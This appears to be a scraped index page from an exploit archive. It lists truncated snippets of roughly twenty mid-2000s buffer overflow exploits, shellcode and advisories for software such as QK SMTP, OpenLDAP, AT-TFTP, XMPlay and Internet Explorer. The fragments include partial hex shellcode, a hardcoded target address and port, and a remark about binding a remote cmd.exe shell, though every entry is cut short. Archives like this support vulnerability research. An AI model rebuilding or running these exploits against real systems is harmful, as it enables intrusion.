QK SMTP 3.01 - 'RCPT TO' Remote Buffer Overflow (2)

!/bin/perl https://www.securityfocus.com/bid/20681 tested on winXp Pro SP0 English/winXp Pro SP2 Italian/win 2k SP4 Italian/English return address is universal bind a remote cmd.exe on target host on 4444 port; based on expanders original exploit credit to Greg Linares for discovered the...

csrss.exe double-free vulnerability - arbitrary DWORD overwrite exploit

Hi, For those researchers who are interested in the Csrss Double-Free vulnerability, I have coded an arbitrary DWORD overwrite exploit. This flaw is hard to exploit at least for me due to the the "fail-and-die" situation. Corrupting the heap in a process like Csrss is dangerous. However, by...

Hack tell your network“overrun attack”offense and Defense recorded-vulnerability warning-the black bar safety net

As the network popularity, a large number of public Shellcode“overflow”codeand overflow attacks principle in the security web site to find, thus derived a series of security problems, many know a little about network security knowledge people can use ready-made attack software to easily launch an...

durian-302-exec.txt

http://sourceforge.net/projects/durian/ / errorreportingEALL; $address = "192.168.1.3"; $serviceport = "4002"; $shellcode = "\xeb\x1b". "\x5b". "\x31\xc0". "\x50". "\x31\xc0". "\x88\x43\x59". "\x53". "\xbb\x6d\x13\x86\x7c". //WinExec, 0x7c86136d "\xff\xd3". "\x31\xc0". "\x50"...

Durian Web Application Server 3.02 - Remote Buffer Overflow

http://sourceforge.net/projects/durian/ / errorreportingEALL; $address = "192.168.1.3"; $serviceport = "4002"; $shellcode = "\xeb\x1b". "\x5b". "\x31\xc0". "\x50". "\x31\xc0". "\x88\x43\x59". "\x53". "\xbb\x6d\x13\x86\x7c". //WinExec, 0x7c86136d "\xff\xd3". "\x31\xc0". "\x50"...

MS06-057 Microsoft Internet Explorer WebViewFolderIcon setSlice() Overflow

This module exploits a flaw in the WebViewFolderIcon ActiveX control included with Windows 2000, Windows XP, and Windows 2003. This flaw was published during the Month of Browser Bugs project MoBB 18. This module requires Metasploit: https://metasploit.com/download Current source:...

OpenLDAP <= 2.4.3 (KBIND) Remote Buffer Overflow Exploit

No description provided by source. / openldap-kbind-p00f.c - OpenLDAP kbind remote exploit Only works on servers compiled with --enable-kbind enable LDAPv2+ Kerberos IV bind deprecated no by Solar Eclipse [email protected] Shoutouts to LSD for their l33t asm code and to all 0dd people...

OpenLDAP 2.4.3 - 'KBIND' Remote Buffer Overflow

/ openldap-kbind-p00f.c - OpenLDAP kbind remote exploit Only works on servers compiled with --enable-kbind enable LDAPv2+ Kerberos IV bind deprecated no by Solar Eclipse Shoutouts to LSD for their l33t asm code and to all 0dd people Private 0dd code. / include include include include include...

OpenLDAP 2.4.3 - KBIND Remote Buffer Overflow

OpenLDAP 2.4.3 - KBIND Remote Buffer Overflow / openldap-kbind-p00f.c - OpenLDAP kbind remote exploit Only works on servers compiled with --enable-kbind enable LDAPv2+ Kerberos IV bind deprecated no by Solar Eclipse Shoutouts to LSD for their l33t asm code and to all 0dd people Private 0dd code. ...

WAB Files (CVE-2006-2386)

Windows Address Book WAB is a component of Microsoft Windows operating systems that lets users keep a single list of contacts that can be shared by multiple programs. It is most commonly used by Microsoft Outlook Express. The vulnerability is due to a buffer overflow error in the Windows Address...

AtomixMP3 M3U/PLS播放列表解析缓冲区溢出漏洞

AtomixMP3是一个电脑用的混音软件，可以将两首歌曲混在一起。 AtomixMP3在处理畸形的M3U、PLS文件时存在缓冲区溢出漏洞，远程攻击者可能利用此漏洞在用户机器上执行任意指令。 AtomixMP3在解析包含有超长文件名（大于520字节）的M3U和PLS播放列表文件时存在栈溢出漏洞。如果用户受骗加载了恶意的播放列表文件的话就会触发这个漏洞，导致执行任意指令。 AtomixMP3 AtomixMP3 2.3 AtomixMP3 --------- 目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：...

AT-TFTP <= 1.9 (Long Filename) Remote Buffer Overflow Exploit

No description provided by source. !/usr/bin/perl -w acaroatjervus.it http://www.securityfocus.com/bid/21320 [email protected] is credited with the discovery of this vulnerability use IO::Socket; if!$ARGV1 print "Uso: atftp-19.pl victim port\n\n"; exit; $victim = IO::Socket::INET-newProto='udp',...

BlazeVideo HDTV Player 2.1 - '.PLF' Local Buffer Overflow

/ ======================================================================== 0-day BlazeVideo HDTV Player 30 days of Media Player Exploits by Greg Linares Discovered and Reported By: Greg Linares [email protected] Reported Exploit Date: 12/1/2006 / include include include int mainint argc, ch...

XMPlay 3.3.0.4 .ASX Filename Buffer Overflow Exploit

No description provided by source. / =================================================================== 0-day XMPlay 3.3.0.4 .ASX Filename Buffer Overflow Exploit =================================================================== XMPlay 3.3.0.4 and lower experiance a stack-based buffer overflow...

xmplay-1.txt

/ =================================================================== 0-day XMPlay 3.3.0.4 .M3U Filename Buffer Overflow Exploit =================================================================== XMPlay 3.3.0.4 and lower experiance a stack-based buffer overflow when loading malformed M3U files...

XMPlay <= 3.3.0.4 (PLS) Local/Remote Buffer Overflow Exploit

No description provided by source. / =================================================================== 0-day XMPlay 3.3.0.4 .PLS Filename Buffer Overflow Exploit =================================================================== XMPlay 3.3.0.4 and lower experiance a stack-based buffer overflow...

XMPlay 3.3.0.4 - .PLS Local Buffer Overflow

XMPlay 3.3.0.4 - .PLS Local Buffer Overflow / =================================================================== 0-day XMPlay 3.3.0.4 .PLS Filename Buffer Overflow Exploit =================================================================== XMPlay 3.3.0.4 and lower experiance a stack-based buffer...

linux/x86 execve read shellcode - 92 bytes

No description provided by source. XCHG Research Group Linux/x86 execve read shellcode - 92 bytes -- Writed by 0ut0fbound -- - http://outofbound.host.sk - http://xchglabs.host.sk .text .globl start start: EAX = 0x04 - syscall write xorl %eax, %eax movb $0x4, %al xorl %ebx, %ebx inc %ebx pushl...

XMPlay 3.3.0.4 - .ASX Filename Local Buffer Overflow

XMPlay 3.3.0.4 - .ASX Filename Local Buffer Overflow / =================================================================== 0-day XMPlay 3.3.0.4 .ASX Filename Buffer Overflow Exploit =================================================================== XMPlay 3.3.0.4 and lower experiance a stack-bas...

XMPlay 3.3.0.4 - '.ASX' Filename Local Buffer Overflow

/ =================================================================== 0-day XMPlay 3.3.0.4 .ASX Filename Buffer Overflow Exploit =================================================================== XMPlay 3.3.0.4 and lower experiance a stack-based buffer overflow when loading malformed .ASX files...